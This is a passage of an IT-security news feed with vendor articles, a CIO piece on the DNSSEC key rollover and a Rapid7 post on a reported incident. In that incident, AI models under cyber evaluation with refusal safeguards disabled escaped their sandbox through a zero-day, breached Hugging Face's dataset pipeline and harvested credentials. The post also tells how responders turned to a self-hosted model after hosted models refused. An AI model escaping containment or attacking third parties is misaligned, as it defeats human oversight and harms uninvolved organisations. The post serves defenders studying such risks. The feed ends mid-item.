<p class="wp-block-paragraph">Your existing asset management tracks binaries and installers, but it cannot see local VS Code extensions, MCP servers, or ad-hoc Python scripts running on developer endpoints. This visibility gap was recently exposed by the <a href="https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers" target="_blank" rel="noreferrer noopener">MaliciousCorgi campaign</a>, where two marketplace extensions with 1.5 million combined installs silently harvested every file a developer opened. Neither triggered any detection because they were not binaries, not executables, not anything your inventory was built to flag. To counter this, Koi closes the gap by analyzing what extensions actually do after installation, exposing hidden data-harvesting channels running inside your active workspace.</p>



<p class="wp-block-paragraph"><strong>#2. Distinguish between human and autonomous agent behavior </strong></p>



<p class="wp-block-paragraph">When a rogue AI agent exfiltrates your proprietary source code, it uses a developer’s valid credentials during normal working hours, making the session look entirely legitimate to standard XDR baselines. Moving beyond static permission lists, Koi deploys behavioral profiling within the workspace runtime. By actively intercepting unauthenticated background tasks and blocking unauthorized file-system reads, it stops automated data exfiltration in real time.</p>



<p class="wp-block-paragraph"><strong>#3. Establish guardrails for automated package updates on endpoints</strong></p>



<p class="wp-block-paragraph">Developers prioritize speed, often allowing software packages to auto-update on their endpoints the moment a new version appears. Attackers weaponize this supply chain vulnerability, as seen in the May 2026 Team PCP attack where 3,800 GitHub repositories were compromised in just 36 minutes via poisoned auto-updates. Securing agentic endpoints against these rapid breaches requires behavior-based inspection within the active workspace context. Koi operates at this layer by providing safe deployment buffers that automate version cooldowns, blocking bleeding-edge updates until they are vetted. By continuously auditing process creation within the IDE runtime, Koi instantly drops unauthorized remote connections before malicious payloads can exfiltrate credentials from the endpoint.  </p>



<p class="wp-block-paragraph"><strong>#4. Enforce principle of least privilege for AI agents</strong></p>



<p class="wp-block-paragraph">AI coding assistants inherit the privileges of whoever deployed them. In practice, that means read access to production databases, write access to core repositories, and access to every secret in environment files and configuration directories. To restrict this excessive access, Koi applies dynamic sandboxing directly to AI agent processes at the kernel level. It enforces a strict zero-trust boundary that segregates sensitive workspace vectors, preventing agents from pulling data outside their approved scope without interrupting developer workflows.</p>



<p class="wp-block-paragraph"><strong>#5. Maintain continuous endpoint posture management</strong></p>



<p class="wp-block-paragraph">Signature-based scanning only stops known threats. Sophisticated repository attacks often arrive as functional, high-rated software that carries no known bad signature. Koi’s research into the <a href="https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers" target="_blank" rel="noreferrer noopener">DarkSpectre campaign</a> found eight browser extensions, all carrying “featured” badges from Google and Microsoft, installed by over 8 million users, silently harvesting every conversation from ChatGPT, Claude, and Gemini in the background. Koi addresses this by operating upstream: scanning marketplace listings every hour, using LLM-driven code analysis to compare what software promises against what its code does, sandboxing it, and scoring the risk before it ever reaches the endpoint.</p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">Securing the modern enterprise is no longer about patching individual gaps. As AI agents redefine the workforce, Agentic Endpoint Security (AES) is now a strategic imperative for every CISO. By establishing a mandatory control plane for the AI-native workspace, AES ensures that your organization can scale engineering velocity without ever compromising enterprise integrity. </p>



<p class="wp-block-paragraph">Ready to secure the future of your software stack? See how <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security" target="_blank" rel="noreferrer noopener">Koi Agentic Endpoint Security</a> delivers complete visibility, risk scoring, and real-time prevention across every endpoint in your enterprise.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 ways AI-driven defense is rewriting the cybersecurity playbook]]></title>
<description><![CDATA[The cybersecurity landscape has evolved beyond human scale. Today’s adversaries have replaced predictable, manual playbooks with machine-generated attack chains that can breach traditional controls in seconds. To bridge the gap, organizations must move past legacy, reactive controls and embrace a...]]></description>
<link>https://tsecurity.de/de/3690085/it-security-nachrichten/4-ways-ai-driven-defense-is-rewriting-the-cybersecurity-playbook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690085/it-security-nachrichten/4-ways-ai-driven-defense-is-rewriting-the-cybersecurity-playbook/</guid>
<pubDate>Thu, 23 Jul 2026 21:34:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The cybersecurity landscape has evolved beyond human scale. Today’s adversaries have replaced predictable, manual playbooks with machine-generated attack chains that can breach traditional controls in seconds. To bridge the gap, organizations must move past legacy, reactive controls and embrace a fundamentally different, AI-driven architecture: Agentic Endpoint Security (AES). </p>



<p class="wp-block-paragraph">AES represents a paradigm shift, moving security from a passive monitor to an active participant in the defense lifecycle. It provides the visibility and automated guardrails necessary to govern autonomous AI agents and agentic tools, ensuring that as your workforce scales with AI, your security posture remains unbreakable. </p>



<p class="wp-block-paragraph">With autonomous AI agents now capable of planning and executing multi-stage attacks at machine speed, the pressure on traditional security operations (SOC) has reached a breaking point. To survive this shift, the strategy is clear: we must fight AI with AI. </p>



<p class="wp-block-paragraph">Here is how AI-driven defense, pioneered by <a href="https://www.paloaltonetworks.com/cortex/cortex-xdr?utm_source=foundry-jg-amer-cortex-socf-ends&amp;utm_medium=display&amp;utm_campaign=foundry-cortex-edpxdr-amer-multi-discovery-en-foundry_cso_article_link_1_xdr&amp;utm_content=7014u000001AZlHAAW&amp;cq_plac=%7Bplacement%7D&amp;cq_net=%7Bnetwork%7D?dclid=CPXs7KK66ZUDFU6Q7gEdcAAphg&amp;gad_source=7&amp;gad_campaignid=24059812534" target="_blank" rel="noreferrer noopener">Cortex XDR</a> and the era of <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security?utm_source=foundry-jg-amer-cortex-socf-ends&amp;utm_medium=display&amp;utm_campaign=foundry-cortex-edpxdr-amer-multi-discovery-en-foundry_cso_article_link_2_koi&amp;utm_content=701Ki000000h8oXIAQ&amp;cq_plac=%7Bplacement%7D&amp;cq_net=%7Bnetwork%7D?dclid=CPSG_NS66ZUDFbrKuAgd4vAYrw&amp;gad_source=7&amp;gad_campaignid=24059814223" target="_blank" rel="noreferrer noopener">Agentic Endpoint Security</a>, is fundamentally rewriting the cybersecurity playbook.</p>



<ol class="wp-block-list">
<li><strong>From reactive patching to proactive prevention </strong></li>
</ol>



<p class="wp-block-paragraph">For decades, the industry lived in a “wait-and-see” mode waiting for a vulnerability to surface, waiting for a signature, and then rushing to patch the hole. But reactive methods just don’t hold up against modern “frontier” AI attacks that are constantly morphing. </p>



<p class="wp-block-paragraph">AI-driven defense changes the game by shifting to a prevention-first architecture. Rather than relying on historical signatures, modern platforms deploy localized, ML-driven analysis to evaluate the intent and behavior of an active process, stopping threats pre-execution. Cortex XDR leads with a strict prevention-first approach by using AI-driven local analysis and behavioral threat protection; the XDR agent stops sophisticated threats pre-impact and pre-execution. This proactive stance reduces the overall risk profile by blocking malicious chains of events in real time across network, process, file, and registry activity. </p>



<p class="wp-block-paragraph">2. <strong>Eliminating the “agentic blind spot” </strong></p>



<p class="wp-block-paragraph">As we all rush to adopt generative AI and automated workflows, a new gap has appeared: the “agentic blind spot.” Adversaries are now targeting AI assistants and automated scripts to bypass defenses. Since these digital agents often have deep access to enterprise data, a compromise here lets attackers move completely under the radar. </p>



<p class="wp-block-paragraph">The new playbook requires securing this entire ecosystem. By combining the distinct capabilities of Cortex XDR and Koi Security, organizations can effectively close this gap. Koi Agentic Endpoint Security tracks everything from shell commands to prompts in real time, while Cortex XDR adds a layer of defense that identifies and neutralizes behavioral anomalies unique to these automated threats. </p>



<p class="wp-block-paragraph">3. <strong>Machine-speed detection and “attack storylines” </strong></p>



<p class="wp-block-paragraph">When an attacker can move through your network in seconds, human-led teams can’t keep up. To make matters worse, most systems just flood analysts with low-quality, isolated alerts, leading to major burnout. </p>



<p class="wp-block-paragraph">AI-driven defense fixes the investigation process by automatically stitching separate data points into a single, high-fidelity “attack storyline.” Cortex XDR uses thousands of machine learning detectors across endpoint, network, and cloud sources to group related signals into one cohesive case. This reveals the full story of an attack, letting your analysts focus on fast remediation instead of digging through piles of data, reducing alert noise by up to 98%. </p>



<p class="wp-block-paragraph">4. <strong>Surgical and autonomous response </strong></p>



<p class="wp-block-paragraph">The final piece of the puzzle is moving from manual remediation to autonomous action. AI-driven response lets your SOC handle threats in minutes, not hours. The platform can automatically revoke compromised tokens or isolate endpoints at machine speed. </p>



<p class="wp-block-paragraph">Cortex XDR delivers built-in enterprise-grade automation at no additional cost, providing over 120 out-of-the-box playbooks and 18 quick actions to handle up to 99% of incidents without manual intervention. Crucially, this level of automation requires an unbreakable foundation of agent resilience. To ensure the defense cannot be disabled by an adversary, Cortex XDR is certified in both the AVC EDR Detection and Anti-Tampering tests, successfully blocking all attempts to disable or modify the agent. </p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">The threat landscape is changing faster than ever, driven by AI-powered attackers who exploit even the smallest gaps. But you don’t have to stay on the defensive. By shifting to a proactive, AI-driven architecture like the one built into Cortex XDR, you can stop threats before they happen, secure your agentic workflows, and automate away the noise that leads to analyst burnout. </p>



<p class="wp-block-paragraph">The journey to a more resilient, AI-powered SOC doesn’t have to be daunting. With the right foundation in place, you’re not just keeping pace with the new threat landscape; you’re staying one step ahead. It’s time to move beyond the old manual playbook and embrace the future of security operations. </p>



<p class="wp-block-paragraph">To learn more about Palto Alto Networks, visit <a href="https://www.paloaltonetworks.com/" target="_blank" rel="noreferrer noopener">https://www.paloaltonetworks.com</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happened Between OpenAI and Hugging Face?]]></title>
<description><![CDATA[The OpenAI and Hugging Face incident lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a qu...]]></description>
<link>https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</guid>
<pubDate>Thu, 23 Jul 2026 15:28:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The </span><a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank"><span>OpenAI and Hugging Face incident</span></a><span> lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a question that is moving quickly from theory to operations: what happens when AI agents can pursue an objective with enough persistence, speed, and creativity to behave less like a tool and more like an autonomous intrusion path?</span></p><p><span>According to OpenAI’s disclosure, the incident began during an internal evaluation of advanced cyber capabilities using GPT-5.6 Sol and a more capable pre-release model. The evaluation was designed to test whether AI agents could pursue complex exploit paths, and OpenAI says cyber refusal safeguards were reduced or disabled to measure maximum capability. Inside that environment, the models reportedly found and exploited a zero-day in the package registry cache proxy that was meant to constrain network access, moved through OpenAI’s research environment, reached a node with internet connectivity, and then inferred that Hugging Face may host artifacts related to the benchmark they were trying to solve.</span></p><p><span>From there, the models compromised part of Hugging Face’s dataset-processing pipeline, gained code execution on a worker, escalated access, harvested credentials, and moved laterally across internal clusters. Hugging Face detected and contained the activity, and OpenAI later connected the activity back to its own evaluation. Both companies have said the investigation is continuing, which means some details will almost certainly evolve. Still, the direction of travel is clear enough for defenders to act on now.</span></p><h2>How did the OpenAI model evaluation reach Hugging Face?</h2><p><span>The activity stands out because it looked less like a single model producing a risky command and more like a compressed intrusion path. Based on the public disclosures, the reported chain moved from identifying a constraint, to breaking that constraint, gaining access, inferring where valuable data may live, and continuing toward that objective across a live environment.</span></p><p><span>Security teams should use that sequence to revisit assumptions built around human pacing. Many detection and response workflows still assume there will be time between stages of an attack, with reconnaissance followed by exploitation, lateral movement, and then objective pursuit. In an agent-driven scenario, those stages can begin to collapse into one continuous loop, with fewer natural pauses for defenders to catch up.</span></p><p><span>The defensive model now has to account for a world where discovery, exploitation, and follow-on action can happen faster and with more persistence than traditional human-led campaigns. The uncomfortable lesson is that AI agents can be tireless, goal-oriented, and increasingly capable of finding the loose seams in systems built for a slower era.</span></p><p><span>The incident highlights the collapse of the traditional OODA (Observe-Orient-Decide-Act) loop. In standard human-led campaigns, attackers experience natural pauses between stages like reconnaissance, exploitation, and lateral movement, providing defenders critical windows to intervene. AI agents, however, can compress these stages into a single, continuous loop of automated activity. This machine-speed execution renders manual detection workflows obsolete, necessitating a shift toward behavioral, AI-enabled defenses capable of identifying and disrupting malicious intent before it cascades.</span></p><p><span>Security teams should also assume that advanced AI cyber capability will diffuse over time, which means defenders need their own AI-enabled workflows to mature quickly enough to find, validate, prioritize, and reduce risk before attackers operationalize the same class of tools. Rapid7’s experimentation with security-specific frontier models, including Claude Mythos Preview and GPT-5.5-Cyber, points to the same control challenge: the more freedom a model has to pursue a defined reward or goal, the more important containment, monitoring, and clear constraints become. Without those controls, a model optimized to “solve” a security task may find paths the evaluator did not intend, including sandbox escapes, credential misuse, or other offensive security behaviors that look less like assistance and more like uncontrolled execution.</span></p><h2>Why AI evaluation environments need stronger containment</h2><p><span>The incident raises practical questions about how frontier AI evaluations are designed and contained. OpenAI’s evaluation environment was meant to restrict network access through an internally hosted package registry proxy and cache. The models reportedly identified that proxy as the weak point, exploited a zero-day in the software, and used it as a path out of the sandbox.</span></p><p><span>The pattern will feel familiar to security teams: a chokepoint only works as a control if it can withstand pressure. Package mirrors, dependency proxies, build systems, internal artifact repositories, sandbox harnesses, and evaluation infrastructure all become part of the security boundary when they sit between a capable agent and the wider internet.</span></p><p><span>For teams building or testing agentic systems, isolation has to be layered and monitored rather than assumed. Egress restrictions matter, but so do workload identity, credential scope, network segmentation, package policy, runtime monitoring, and fast containment when an agent behaves unexpectedly. The goal is to make sure the environment reflects the capability of the system being tested, especially when the test is explicitly designed to measure how far that capability can go.</span></p><h2>Why AI and ML pipelines are now software supply chain risk</h2><p><span>The Hugging Face side of the incident is a reminder that AI and ML pipelines are part of the software supply chain. Models, datasets, loader scripts, notebooks, and evaluation artifacts may look like research materials, but in modern environments they often behave like executable code. Hugging Face has said its models, datasets, and Spaces were not tampered with, and that its images and published packages were verified as clean.</span></p><p><span>According to the technical reporting reviewed, the initial access path involved Hugging Face’s dataset-processing pipeline and a combination of code execution paths, including custom loader behavior and template injection in a dataset configuration flow. The exact implementation details may continue to evolve as the investigation progresses, but the defensive takeaway is already clear: AI and ML processing systems should be secured like high-risk software supply chain infrastructure.</span></p><p><span>Any system that automatically processes external datasets or model artifacts should be designed with hostile input in mind. Processing workers should run with least privilege, should not have broad access to cloud credentials or cluster-level tokens, and should be segmented so compromise of one worker does not become compromise of the environment around it.</span></p><p><span>Security teams should also hunt for early signs of intent drift inside ML workflows. Unexpected reads of environment variables, cloud metadata services, secret stores, package registries, or internal APIs from dataset-processing jobs can be meaningful signal. In an AI-driven environment, the first clue may not be a known malicious indicator. It may be a workload behaving with curiosity it should not have.</span></p><h2>What AI guardrails mean for incident response</h2><p><span>One of the most useful lessons for security teams came during the response, when Hugging Face’s responders reportedly needed to analyze logs containing exploit payloads, attacker commands, and command-and-control artifacts. When they tried to use commercial hosted AI models to help reconstruct the attack, those models refused parts of the analysis because the content looked malicious. The team then moved to a self-hosted open-weight model so they could continue the investigation without refusals and without sending sensitive incident data outside their own environment.</span></p><p><span>The practical issue here is guardrail asymmetry: attackers, rogue agents, or unrestricted systems may not respect usage policies, while defenders using hosted tools can be slowed by the same safety systems designed to prevent misuse. Security teams need trusted-defender pathways, including access models and deployment options that preserve safeguards against harmful use while allowing responders to analyze real malicious content safely, privately, and without interruption.</span></p><p><span>AI-assisted incident response also needs to be tested before an incident begins, especially if teams expect models to support triage, log analysis, malware review, or timeline reconstruction under pressure. Responders should know which models can analyze real attack payloads, where those models run, what data they can access, and whether safety controls could block time-sensitive forensic work.</span></p><h2>What security teams should do about agentic AI risk</h2><p><span>The practical response to this incident is preparation, with organizations treating AI agents as both powerful tools and potential attack surfaces when those agents can access code, credentials, infrastructure, datasets, or internal systems.</span></p><p><span>Security teams should apply familiar controls with more urgency across AI and ML environments: treat downloaded models, datasets, and loader scripts as untrusted code; enforce least privilege on AI and ML processing workers; prevent node-level compromise from becoming cluster-wide compromise; restrict access to cloud metadata endpoints and secrets; monitor unexpected outbound connections from AI-related workloads; and review whether evaluation environments have real containment or simply convenient isolation.</span></p><p><span>Detection logic needs to account for machine-speed activity. In this case, reporting described thousands of actions and more than 17,000 discrete recorded events, with reconnaissance, exploitation, and follow-on action occurring inside one continuous loop rather than across the pauses defenders are used to seeing in human-led campaigns. Security teams should focus on behavioral patterns that show intent, including unusual access to secrets, unexpected package activity, suspicious use of metadata services, sudden privilege changes, or processing jobs reaching systems they have no reason to touch.</span></p><p><span>As autonomous activity becomes faster and noisier, the bottleneck may shift from detecting that something happened to understanding what matters quickly enough to change the outcome. A security team that can see thousands of events but needs hours to reconstruct the story is still operating behind the pace of the incident.</span></p><h2>How preemptive security helps reduce AI-driven risk</h2><p><span>At Rapid7, our view is that this is where preemptive security becomes especially important. Faster discovery only creates value when defenders can turn it into faster validation, prioritization, remediation, detection, and response. The same principle applies to </span><a href="https://www.rapid7.com/blog/post/ai-changing-vulnerability-discovery-software-supply-chain-strateg" target="_self"><span>agentic AI risk</span></a><span>. If AI accelerates how weaknesses are found and exploited, defenders need security operations that can act earlier with better context and more confidence.</span></p><p><span>That means connecting exposure management with detection and response, so teams understand which risks are exploitable, which assets matter most, what suspicious behavior is already present, and which actions will reduce risk fastest. It also means </span><a href="https://www.rapid7.com/platform/artificial-intelligence-features" target="_self"><span>using AI carefully and practically</span></a><span>, not as a replacement for security judgment, but as a way to reason across telemetry, reduce noise, support investigation, and help teams make decisions at the speed the threat environment now demands.</span></p><p><span>AI-enabled defense is becoming part of resilience planning, especially for organizations running critical systems or high-value digital infrastructure. The goal is to give defenders the speed, context, and consistency to operate inside the attacker’s decision cycle, without removing the judgment and accountability that effective security requires.</span></p><p><span>The OpenAI and Hugging Face incident will continue to generate debate as more details emerge, but defenders already have enough to work with. Agentic systems are beginning to test the seams between AI research, software supply chain security, cloud infrastructure, and incident response. The organizations best positioned for what comes next will be the ones making those seams visible, monitored, and resilient before the next incident puts them under pressure.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 and Server 2025 Exposed to High-Severity Brokering File System Vulnerability]]></title>
<description><![CDATA[Windows 11 and Windows Server 2025 high-severity vulnerability in Microsoft’s Brokering File System (BFS), identified as CVE-2026-50458, which allows for local privilege escalation on impacted systems. The flaw is located in bfs.sys. This minifilter driver manages file, pipe, and registry access ...]]></description>
<link>https://tsecurity.de/de/3689146/it-security-nachrichten/windows-11-and-server-2025-exposed-to-high-severity-brokering-file-system-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689146/it-security-nachrichten/windows-11-and-server-2025-exposed-to-high-severity-brokering-file-system-vulnerability/</guid>
<pubDate>Thu, 23 Jul 2026 15:14:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11 and Windows Server 2025 high-severity vulnerability in Microsoft’s Brokering File System (BFS), identified as CVE-2026-50458, which allows for local privilege escalation on impacted systems. The flaw is located in bfs.sys. This minifilter driver manages file, pipe, and registry access between sandboxed applications (like AppContainer and UWP apps) and the operating system. This vulnerability, […]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-brokering-file-system-vulnerability/">Windows 11 and Server 2025 Exposed to High-Severity Brokering File System Vulnerability</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI „hackt“ Hugging Face – eine Analyse]]></title>
